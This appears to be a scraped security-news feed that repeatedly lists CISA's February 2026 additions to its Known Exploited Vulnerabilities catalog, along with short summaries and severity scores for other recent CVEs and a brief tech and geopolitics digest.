- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-2441
Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.
##Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-17T21:22:13.900000
2 posts
🟠 CVE-2025-13691 - High (8.1)
IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13691/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13691 - High (8.1)
IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13691/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:22:13.697000
4 posts
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-7694
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-7694
updated 2026-02-17T21:22:12.967000
4 posts
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2020-7796
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2020-7796
updated 2026-02-17T21:16:49.580000
4 posts
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2008-0015
🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2008-0015
updated 2026-02-17T18:34:01
2 posts
🟠 CVE-2025-70956 - High (7.5)
A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70956/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70956 - High (7.5)
A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70956/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:33:00
2 posts
1 repos
🔴 CVE-2025-65753 - Critical (9)
An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65753/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65753 - Critical (9)
An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65753/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:33:00
2 posts
🟠 CVE-2025-70397 - High (8.8)
jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70397/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70397 - High (8.8)
jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70397/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:33:00
2 posts
1 repos
🔴 CVE-2025-70830 - Critical (9.9)
A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70830 - Critical (9.9)
A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:32:57
2 posts
1 repos
🟠 CVE-2025-70828 - High (8.8)
An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70828 - High (8.8)
An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T16:20:26.010000
2 posts
🟠 CVE-2025-70866 - High (8.8)
LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70866/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70866 - High (8.8)
LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70866/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
4 posts
🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65717 - Critical (9.1)
An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
2 posts
🟠 CVE-2025-65716 - High (8.8)
An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65716 - High (8.8)
An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
2 posts
🔴 CVE-2025-15578 - Critical (9.8)
Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15578/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-15578 - Critical (9.8)
Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.
